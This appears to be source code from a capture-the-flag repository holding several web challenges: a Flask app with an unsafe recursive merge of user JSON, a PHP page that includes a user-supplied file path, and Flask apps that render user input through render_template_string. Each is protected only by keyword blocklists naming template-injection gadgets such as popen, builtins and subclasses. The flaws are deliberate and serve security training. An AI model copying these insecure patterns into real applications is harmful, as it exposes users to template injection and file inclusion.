render_template("login.html") 49 | 50 | @app.route('/register',methods=['GET','POST']) 51 | def register(): 52 | if request.method == 'POST': 53 | try: 54 | if waf(request.data): 55 | return "fuck payload!Hacker!!!" 56 | data=json.loads(request.data) 57 | if "username" not in data or "password" not in data: 58 | return "连用户名密码都没有你注册啥呢" 59 | user=hhh() 60 | merge(data,user) 61 | registered_users.append(user) 62 | except Exception as e: 63 | return "泰酷辣,没有注册成功捏" 64 | return redirect(url_for('login')) 65 | else: 66 | return render_template("register.html") 67 | 68 | @app.route('/flag',methods=['GET']) 69 | def flag(): 70 | user = next((user for user in registered_users if user.username ==session['username'] and user.password == session['password']), None) 71 | if user: 72 | if user.isvip: 73 | data=request.args.get('num') 74 | if data: 75 | if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10: 76 | flag = os.environ.get('geek_flag') 77 | return render_template('flag.html',flag=flag) 78 | else: 79 | return "你的数字不对哦!" 80 | else: 81 | return "I need a num!!!" 82 | else: 83 | return render_template_string('这种神功你不充VIP也想学?

要不v我50,我送你一个VIP吧,嘻嘻

') 84 | else: 85 | return "先登录去" 86 | 87 | def merge(src, dst): 88 | for k, v in src.items(): 89 | if hasattr(dst, '__getitem__'): 90 | if dst.get(k) and type(v) == dict: 91 | merge(v, dst.get(k)) 92 | else: 93 | dst[k] = v 94 | elif hasattr(dst, k) and type(v) == dict: 95 | merge(v, getattr(dst, k)) 96 | else: 97 | setattr(dst, k, v) 98 | 99 | 100 | 101 | if __name__ == '__main__': 102 | app.run(host="0.0.0.0",port="8888") -------------------------------------------------------------------------------- /Web/ezpython/src/requirements.txt: -------------------------------------------------------------------------------- 1 | click==7.1.2 2 | Flask==1.1.2 3 | itsdangerous==1.1.0 4 | Jinja2==2.11.2 5 | MarkupSafe==1.1.1 6 | Werkzeug==1.0.1 -------------------------------------------------------------------------------- /Web/ezpython/src/static/1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/1.jpeg -------------------------------------------------------------------------------- /Web/ezpython/src/static/1.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/1.webp -------------------------------------------------------------------------------- /Web/ezpython/src/static/2.avif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/2.avif -------------------------------------------------------------------------------- /Web/ezpython/src/static/2.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/2.webp -------------------------------------------------------------------------------- /Web/ezpython/src/static/4.avif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/4.avif -------------------------------------------------------------------------------- /Web/ezpython/src/static/beijing.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/beijing.jpg -------------------------------------------------------------------------------- /Web/ezpython/src/static/syc.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/syc.jpg -------------------------------------------------------------------------------- /Web/ezpython/src/static/weixin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Web/ezpython/src/static/weixin.png -------------------------------------------------------------------------------- /Web/ezpython/src/templates/flag.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 九幽玄天神功 6 | 7 | 8 |

天得一以日月星辰长清,地得一以珠玉珍长宁,人得一以神气精长存,一者,本也,本乃道之体,道无体,强曰体。九幽有玄天,上玄下九幽;勿约而自同,生死之昭彰;摄阴半摄魂,无相亦无尚;黑白终不化,气海挂灵堂。

9 | 10 |

欲习此功者,务必心存恨意,杀伐果决,以杀气养身,以意念行气,厥气上行,满脉去形,神分脘建中,尾庭中堂宫,经络之气,畅通经脉之海,方可以阴制阳,自此,无气不顺,无脉不通,无所不敌!神阙,水分,下脘,建里,中脘,鸠尾,中庭,膻中,玉堂。

11 | 12 | 13 | 14 |

《九幽玄天神功》武学: 15 | 16 |

玄冥教的镇教神功,至阴至邪。为当世绝顶神功,威力之强,所向无敌。练成之后,全身上下散发九幽地狱之气,犹如阴鬼缠身,煞气逼人。出招时鬼哭神嚎,阴气漫天,一掌打出犹如黑暗降临,吞噬万物,威猛无比,势不可挡,普通人若是中招,顷刻之间,就会被化成飞灰。

17 | 18 |

此神功分上下两卷,上卷名为《九幽》,下卷名为《玄天》。要修炼此神功,必须上下同修,若只修炼一卷,则达不到最高境界,还会走火入魔,变成不人不鬼的样子。

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Web/ezpython/src/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {{ name }}'s Watchlist 6 | 55 | 56 | 57 | 58 |
59 |

{{ name }}'s movies

60 |
61 |
62 |
63 | 64 |

画江湖之不良人第六季

65 |

监国独揽朝政,漠北大军来势汹汹,岐国独木难支,且看李星云如何带领不良人绝地反击!

66 |
67 |
68 | 69 |

画江湖之不良人第五季

70 |

娆疆一行归来,李嗣源已称监国,借天子之名四处绞杀不良人,而身为天子的李星云也即将面临一个新的选择……

71 |
72 |
73 | 74 |

九幽玄天神功

75 |

我这有本医书你学不学?

76 |
77 |
78 | 79 |

凡人修仙传

80 |

看机智的凡人小子韩立如何稳健发展、步步为营,战魔道、夺至宝、驰骋星海、快意恩仇,成为纵横三界的强者。他日仙界重相逢,一声道友尽沧桑。

81 |
82 | 83 |
84 | 1692086589393.jpg 85 |

完美世界

86 |

他为修道而生,为应劫而至,他身化亿万血雨,洒落万古岁月,经历无数时空的熬炼,岁月长河的洗礼,他化万古,他化自在。看男主石昊如何一生极致辉煌,造就无尽传说。

87 |
88 | 89 |
90 | 91 | -------------------------------------------------------------------------------- /Web/ezpython/src/templates/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login 6 | 7 | 8 |

用户登录

9 |
10 |
11 |

12 | 13 |
14 |

15 | 16 | 17 | 18 |
19 | 20 | -------------------------------------------------------------------------------- /Web/ezpython/src/templates/register.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 用户注册 6 | 7 | 8 |

用户注册

9 |
10 |
11 |

12 | 13 |
14 |

15 | 16 | 17 |
18 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /Web/ezpython/src/templates/welcome.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Welcome 6 | 17 | 18 | 19 |

Welcome To Greek Challenge 2023

20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Web/ezpython/src/waf.py: -------------------------------------------------------------------------------- 1 | def waf(data): 2 | data=str(data) 3 | if "isvip" in data or "_static_folder" in data or "os" in data or "loader" in data or "defaults" in data or "kwdefaults" in data: 4 | return True -------------------------------------------------------------------------------- /Web/ezpython/start.sh: -------------------------------------------------------------------------------- 1 | python /app/app.py -------------------------------------------------------------------------------- /Web/ezrfi/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM safoorsafdar/php-7.4.16-apache-buster 2 | 3 | COPY ./index.php /var/www/html 4 | COPY ./hint.py /var/ 5 | COPY ./ffffffllllag / 6 | COPY ./sources.list /etc/apt/ -------------------------------------------------------------------------------- /Web/ezrfi/ffffffllllag: -------------------------------------------------------------------------------- 1 | SYC{The PhpFFffilter 0n File-include vulnerabilities is s0 Amazing!!#@##} -------------------------------------------------------------------------------- /Web/ezrfi/hint.py: -------------------------------------------------------------------------------- 1 | secret="w5YubyBvd08gMHcwIG92MCDDlndvIE8ubyAwLjAgMC5vIMOWdjAgMHbDliBPdjAgT3fDliBvLk8gw5Z2TyAwXzAgMF9PIG8uTyAwdjAgw5ZfbyBPd28gw5Z2TyDDli5PIMOWXzAgTy5PIMOWXzAgMHbDliAwLjAgw5Z2w5Ygw5Z3MCBPdsOWIMOWdjAgT1/DliDDlnZPIMOWLk8gw5Z3MCBvd8OWIMOWLm8gTy5vIMOWXzAgMHbDliDDlndvIE93w5YgTy5vIE93TyBvX28gw5YuTyBvLm8gb3dPIMOWXzAgb3dPIMOWXzAgMHZvIG8uTyBPd8OWIE92byAwLsOWIMOWdjAgTy7DliAwLjAgMHfDliBvLsOWIG93byBvdzAgMHZvIMOWLm8gb3dPIG9fMCDDli5PIG9fbyBPd8OWIE8ubyBvdzAgw5ZfbyBvd28gw5YuMCDDlnZPIG9fTyBPLsOWIE92MCBPdzAgby7DliAwdjAgT3YwIE9fTyBvLk8gT3bDliDDlnYwIMOWXzAgw5Z3byBvd08gT19vIE93w5Ygby5PIMOWdk8gby4wIDBfMCDDll9vIG93TyBPXzAgMC7DliDDli5vIE8uTyBPdzAgT19vIMOWdjAgb3cwIMOWdjAgT18wIMOWdm8gw5Z2w5Ygw5ZfbyAwX8OWIMOWdm8gw5Z2w5YgMHcwIE92w5Ygw5YubyDDli4wIMOWLm8gb3ZvIMOWLjAgw5YuMCAwd28gb3dPIG8uTyAwd8OWIDB2MCBvd8OWIMOWdzAgw5YubyAwdzAgT1/DliBvX08gw5Z2byAg" 2 | print("guess what it is!!") -------------------------------------------------------------------------------- /Web/ezrfi/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 来读文件玩吧 5 | 6 | 7 | 8 |
9 | 10 |

11 | 12 |
13 | 14 | 15 | 16 | "; 19 | $file=$_GET['file']; 20 | $readfile=include($file.".py"); 21 | if($readfile){ 22 | var_dump($readfile); 23 | }else{ 24 | if(!file_exists($file)){ 25 | echo "no such file!!!"; 26 | }else{ 27 | echo "nonono.you only can read python file!!!."."
"; 28 | } 29 | } 30 | 31 | ?> -------------------------------------------------------------------------------- /Web/ezrfi/sources.list: -------------------------------------------------------------------------------- 1 | deb http://mirrors.aliyun.com/debian/ buster main non-free contrib 2 | deb-src http://mirrors.aliyun.com/debian/ buster main non-free contrib 3 | deb http://mirrors.aliyun.com/debian-security buster/updates main 4 | deb-src http://mirrors.aliyun.com/debian-security buster/updates main 5 | deb http://mirrors.aliyun.com/debian/ buster-updates main non-free contrib 6 | deb-src http://mirrors.aliyun.com/debian/ buster-updates main non-free contrib 7 | deb http://mirrors.aliyun.com/debian/ buster-backports main non-free contrib 8 | deb-src http://mirrors.aliyun.com/debian/ buster-backports main non-free contrib -------------------------------------------------------------------------------- /Web/klf_2/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /Web/klf_2/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | -------------------------------------------------------------------------------- /Web/klf_2/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/klf_2/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /Web/klf_2/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/klf_2/.idea/www.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6 2 | 3 | WORKDIR /app 4 | COPY . . 5 | 6 | 7 | RUN pip install Flask==1.1.1 -i https://pypi.tuna.tsinghua.edu.cn/simple 8 | RUN chmod +x /app/replace.sh 9 | RUN chmod 700 /app/hello/ssti/app.py 10 | 11 | EXPOSE 7889 12 | WORKDIR /app/hello/ssti 13 | CMD ["/bin/sh", "/app/replace.sh"] 14 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - "7889:7889" 8 | volumes: 9 | - ~/www/hello/ssti/templates:/app/www/hello/ssti/templates 10 | - ~/www/hello/ssti/static:/app/www/hello/ssti/static 11 | -------------------------------------------------------------------------------- /Web/klf_2/hello/nonono: -------------------------------------------------------------------------------- 1 | SYC{f4ke_f4ke_flllllllag} -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/.idea/ssti测试.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template, render_template_string,send_from_directory 2 | import re 3 | import os 4 | 5 | app = Flask(__name__) 6 | 7 | @app.route('/', methods=['GET', 'POST']) 8 | def index(): 9 | return render_template('index.html') 10 | 11 | @app.route('/secr3ttt', methods=['GET', 'POST']) 12 | def secr3t(): 13 | klf = request.args.get('klf', '') 14 | template = f''' 15 | 16 | 17 |

别找了,这次你肯定是klf

18 | 19 | g 20 |

%s

21 | 22 | 23 | 24 | 25 | ''' 26 | bl = ['_', '\\', '\'', '"', 'request', "+", 'class', 'init', 'arg', 'config', 'app', 'self', 'cd', 'chr', 27 | 'request', 'url', 'builtins', 'globals', 'base', 'pop', 'import', 'popen', 'getitem', 'subclasses', '/', 28 | 'flashed', 'os', 'open', 'read', 'count', '*', '38', '124', '47', '59', '99', '100', 'cat', '~', 29 | ':', 'not', '0', '-', 'ord', '37', '94', '96', '[',']','index','length']#'43', '45', 30 | for i in bl: 31 | if i in klf: 32 | return render_template('klf.html') 33 | 34 | a = render_template_string(template % klf) 35 | if "{" in a: 36 | return a + render_template('win.html') 37 | 38 | return a 39 | 40 | 41 | 42 | @app.route('/robots.txt', methods=['GET']) 43 | def robots(): 44 | return send_from_directory(os.path.join(app.root_path, 'static'), 45 | 'robots.txt', mimetype='text/plain') 46 | 47 | 48 | 49 | 50 | if __name__ == '__main__': 51 | app.run(host='0.0.0.0', port=7889, debug=False) 52 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/hahahaha: -------------------------------------------------------------------------------- 1 | fl4g不在这哦 2 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==1.1.1 2 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/static/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: /secr3ttt 3 | 4 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

这次我改了位置,你绝对不可能找到的klf

4 |

快去找找!这都找不到,那你是真的klf啊

5 | 6 | 7 | g 8 | 9 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/templates/klf.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | klf 6 | 7 | 8 |

真是klf!!!回去多学学啦,你这样女神不可能看上你的

9 | 10 | g 11 | -------------------------------------------------------------------------------- /Web/klf_2/hello/ssti/templates/win.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | win 6 | 7 | 8 |

好好好你不是klf,我一定会再回来的!

9 | 10 | g 11 | -------------------------------------------------------------------------------- /Web/klf_2/replace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo $GZCTF_FLAG>>/app/fl4gfl4gfl4g 3 | 4 | export GZCTF_FLAG=not_flag 5 | GZCTF_FLAG=not_flag 6 | 7 | python /app/hello/ssti/app.py 8 | -------------------------------------------------------------------------------- /Web/klf_3/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /Web/klf_3/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | -------------------------------------------------------------------------------- /Web/klf_3/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/klf_3/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /Web/klf_3/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/klf_3/.idea/www.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_3/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6 2 | 3 | WORKDIR /app 4 | COPY . . 5 | 6 | 7 | RUN pip install Flask==1.1.1 -i https://pypi.tuna.tsinghua.edu.cn/simple 8 | RUN chmod +x /app/replace.sh 9 | RUN chmod 700 /app/hello/ssti/app.py 10 | 11 | EXPOSE 7888 12 | WORKDIR /app/hello/ssti 13 | CMD ["/bin/sh", "/app/replace.sh"] 14 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_3/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - "7888:7888" 8 | volumes: 9 | - ~/www/hello/ssti/templates:/app/www/hello/ssti/templates 10 | - ~/www/hello/ssti/static:/app/www/hello/ssti/static 11 | -------------------------------------------------------------------------------- /Web/klf_3/hello/nonono: -------------------------------------------------------------------------------- 1 | SYC{f4ke_f4ke_flllllllag} -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/.idea/ssti测试.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template, render_template_string,send_from_directory 2 | import re 3 | import os 4 | 5 | app = Flask(__name__) 6 | 7 | @app.route('/', methods=['GET', 'POST']) 8 | def index(): 9 | return render_template('index.html') 10 | 11 | @app.route('/secr3ttt', methods=['GET', 'POST']) 12 | def secr3t(): 13 | 14 | name = request.args.get('klf', '') 15 | template = f''' 16 | 17 | 18 |

找到secr3t了,但是找不到flag你还是个klf

19 |

%s

20 | 21 | 22 | g 23 | 24 | 25 | 26 | ''' 27 | bl = ['_', '\\', '\'', '"', 'request', "+", 'class', 'init', 'arg', 'config', 'app', 'self', 'cd', 'chr', 28 | 'request', 'url', 'builtins', 'globals', 'base', 'pop', 'import', 'popen', 'getitem', 'subclasses', '/', 29 | 'flashed', 'os', 'open', 'read', 'count', '*', '43', '45', '38', '124', '47', '59', '99', '100', 'cat', '~', 30 | ':', 'not', '0', 'length', 'index', '-', 'ord', '37', '94', '96', '48', '49', '50', '51', '52', '53', '54', 31 | '55', '56', '57', 32 | '58', '59', '[', ']', '@', '^', '#'] 33 | for i in bl: 34 | if i in name: 35 | return render_template('klf.html') 36 | #return "真是klf!!!回去多学学啦" 37 | 38 | pattern = r"\s*\)\s*\)" 39 | match = re.search(pattern, name) 40 | pattern2 = r"\s*\)\s*(,)?\s*\)" 41 | match2 = re.search(pattern2, name) 42 | pattern3 = r"\s*\)\s*\)\s*\|" 43 | match3 = re.search(pattern3, name) 44 | pattern4 = r"\s*,\s*\)\s*\)\s*\|" 45 | match4 = re.search(pattern4, name) 46 | 47 | pattern_mo = r"\d+\s*%\s*\d+|[a-zA-Z]+\s*%\s*[a-zA-Z]+" 48 | matche_mo = re.search(pattern_mo, name) 49 | 50 | if match: 51 | if match2.group(1): 52 | return render_template('klf.html') 53 | elif match4: 54 | return render_template('klf.html') 55 | elif match3: 56 | return render_template_string(template % name) 57 | else: 58 | return render_template('klf.html') 59 | 60 | # 输出匹配的结果 61 | if matche_mo : 62 | return render_template('klf.html') 63 | 64 | 65 | a=render_template_string(template % name) 66 | if "{" in a: 67 | return a + render_template('win.html') 68 | return a 69 | @app.route('/robots.txt', methods=['GET']) 70 | def robots(): 71 | return send_from_directory(os.path.join(app.root_path, 'static'), 72 | 'robots.txt', mimetype='text/plain') 73 | 74 | 75 | 76 | 77 | if __name__ == '__main__': 78 | app.run(host='0.0.0.0', port=7888, debug=False) 79 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/hahahaha: -------------------------------------------------------------------------------- 1 | fl4g不在这哦 2 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==1.1.1 2 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/static/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: /secr3ttt 3 | 4 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

我又回来了!这次我一定不是klf,被女神骂klf的一定是你们!

4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/templates/klf.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | klf 6 | 7 | 8 |

看来这次你就是klf!!!回去等着被女神骂吧 小klf

9 | 10 | g 11 | -------------------------------------------------------------------------------- /Web/klf_3/hello/ssti/templates/win.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | win 6 | 7 | 8 |

好好好看来我真的是klf!呜呜呜!,但是我绝对不会放弃我的女神的呜呜呜

9 | 10 | g 11 | -------------------------------------------------------------------------------- /Web/klf_3/replace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo $GZCTF_FLAG>>/app/fl4gfl4gfl4g 3 | 4 | export GZCTF_FLAG=not_flag 5 | GZCTF_FLAG=not_flag 6 | 7 | python /app/hello/ssti/app.py 8 | -------------------------------------------------------------------------------- /Web/klf_ssti/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /Web/klf_ssti/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | -------------------------------------------------------------------------------- /Web/klf_ssti/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/klf_ssti/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /Web/klf_ssti/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/klf_ssti/.idea/www.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_ssti/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6 2 | 3 | WORKDIR /app 4 | COPY . . 5 | 6 | 7 | RUN pip install Flask==1.1.1 -i https://pypi.tuna.tsinghua.edu.cn/simple 8 | RUN chmod +x /app/replace.sh 9 | RUN chmod 700 /app/hello/ssti/app.py 10 | 11 | 12 | EXPOSE 7899 13 | WORKDIR /app/hello/ssti 14 | CMD ["/bin/sh", "/app/replace.sh"] 15 | 16 | 17 | -------------------------------------------------------------------------------- /Web/klf_ssti/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - "7899:7899" 8 | volumes: 9 | - ~/www/hello/ssti/templates:/app/www/hello/ssti/templates 10 | - ~/www/hello/ssti/static:/app/www/hello/ssti/static 11 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/nonono: -------------------------------------------------------------------------------- 1 | SYC{f4ke_f4ke_flllllllag} -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/.idea/ssti测试.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 15 | 16 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template, render_template_string,send_from_directory 2 | import re 3 | import os 4 | 5 | app = Flask(__name__) 6 | 7 | @app.route('/', methods=['GET', 'POST']) 8 | def index(): 9 | return render_template('index.html') 10 | 11 | @app.route('/hack', methods=['GET', 'POST']) 12 | def secr3t(): 13 | name = request.args.get('klf', '') 14 | template = f''' 15 | 16 | 17 |

啊不,klf原来是这个意思,不可能女神不可能骂我的!

18 |

我不信,就算是klf我也绝对比你们这群klf好,就算是klf我也是最好的那个,这样女神就会回头看我了呜呜呜

19 |

%s

20 | 21 | 22 | 23 | 24 | 25 | ''' 26 | template1 = f''' 27 | 28 | 29 |

啊不,klf原来是这个意思,不可能女神不可能骂我的!

30 |

我不信,就算是klf我也绝对比你们这群klf好,就算是klf我也是最好的那个,这样女神就会回头看我了呜呜呜

31 | 32 | 33 | 34 | 35 | 36 | ''' 37 | render_template_string(template % name) 38 | if name: 39 | return render_template('klf.html') 40 | 41 | return render_template_string(template1) 42 | 43 | @app.route('/robots.txt', methods=['GET']) 44 | def robots(): 45 | return send_from_directory(os.path.join(app.root_path, 'static'), 46 | 'robots.txt', mimetype='text/plain') 47 | 48 | 49 | 50 | 51 | if __name__ == '__main__': 52 | app.run(host='0.0.0.0', port=7899, debug=False) 53 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==1.1.1 2 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/static/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: /hack 3 | 4 | -------------------------------------------------------------------------------- /Web/klf_ssti/hello/ssti/templates/index.html: -------------------------------------------------------------------------------- 1 | 